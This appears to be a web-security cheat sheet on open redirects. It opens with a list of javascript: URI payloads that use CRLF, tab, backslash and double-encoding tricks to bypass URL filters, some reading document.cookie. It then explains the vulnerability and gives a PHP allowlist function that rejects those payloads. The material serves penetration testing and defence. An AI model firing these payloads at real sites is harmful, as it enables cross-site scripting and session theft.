#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
Open redirect through SVG file upload
An open redirect vulnerability can be exploited through SVG uploads. When an application accepts uploaded files and does not validate the URLs embedded in them, an attacker can upload an SVG containing a crafted URL that sends users to a malicious website. This can be used in phishing attacks to trick users into visiting a fake website that appears legitimate.
An open redirect vulnerability exists when a web application allows users to navigate to an external URL of the attacker's choosing. This can be exploited by an attacker to trick users into visiting malicious websites while appearing to be on a trusted domain. To identify open redirect vulnerabilities, testers should look for the following parameters in URLs:
An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Attackers can abuse this vulnerability to trick users into visiting malicious sites by disguising the malicious URL as a trustworthy one.
In this example, the PHP script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicioussite.com to redirect users to a malicious site.
Prevention
To prevent open redirect vulnerabilities, always validate user input before using it in a redirect. Keep an allowlist of permitted domains, or a list of safe URLs, and compare the requested target against it before redirecting. Additionally, never pass user-controlled input directly to the redirect mechanism.
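The following is an added example, not code from the original page, showing the allowlist approach in the same PHP setting as the earlier redirect script. The constant ALLOWED_REDIRECT_HOSTS and the function safeRedirectTarget are assumptions of this example. The commented-out line reproduces the unvalidated pattern described above (reading the url parameter and passing it straight to header()); the function below replaces it and rejects the javascript:, CRLF, tab and backslash variants from the payload list as well as off-allowlist hosts.

```php
<?php
// Added example (not from the original page). Assumed allowlist of hosts
// this application is permitted to redirect to.
const ALLOWED_REDIRECT_HOSTS = ['example.com', 'www.example.com'];

// Unvalidated pattern described earlier on this page (do not use):
// header('Location: ' . $_GET['url']);

/**
 * Return a redirect target that is safe to place in a Location header,
 * or null when the candidate must be rejected.
 *
 * Accepted: a same-origin path (one leading "/", no "//" or "\") or an
 * absolute http(s) URL whose host is on ALLOWED_REDIRECT_HOSTS.
 */
function safeRedirectTarget(string $candidate): ?string
{
    // Browsers strip surrounding whitespace; reject rather than normalise.
    if ($candidate === '' || $candidate !== trim($candidate)) {
        return null;
    }

    // Reject control characters (CR, LF, TAB, NUL, ...) and backslashes
    // before parsing. $_GET is already URL-decoded, so "java%0d%0ascript:",
    // "/%09/javascript:" and "/%5cjavascript:" arrive as the raw bytes
    // matched here. Backslashes are also treated as "/" by browsers, which
    // would turn "/\host" into a protocol-relative redirect.
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $candidate)) {
        return null;
    }

    // Same-origin relative path: exactly one leading slash.
    // "//host/..." is protocol-relative and would leave the site.
    if (preg_match('#^/(?!/)#', $candidate)) {
        return $candidate;
    }

    // Absolute URL: require an http(s) scheme and an allowlisted host.
    // Scheme and host are compared case-insensitively, so "javascripT:"
    // and "jaVAscript:" are rejected like "javascript:".
    $parts = parse_url($candidate);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (!in_array(strtolower($parts['host']), ALLOWED_REDIRECT_HOSTS, true)) {
        // Also covers "http://example.com@evil.example" (host is evil.example)
        // and "http://example.com.evil.example" (host does not match exactly).
        return null;
    }

    return $candidate;
}

// Redirect endpoint: fall back to a fixed location when the target is rejected.
$target = safeRedirectTarget($_GET['url'] ?? '') ?? '/';
header('Location: ' . $target, true, 302);
exit;
```

With this check in place, "https://www.example.com/account" and "/account" are forwarded, while "javascript://%250Aalert(1)", "//%5cjavascript:alert(1)" and "https://attacker.example/" all fall back to "/". Note that the allowlist compares the parsed host exactly, so a configuration entry of "example.com" does not admit subdomains; add them explicitly if they are legitimate targets.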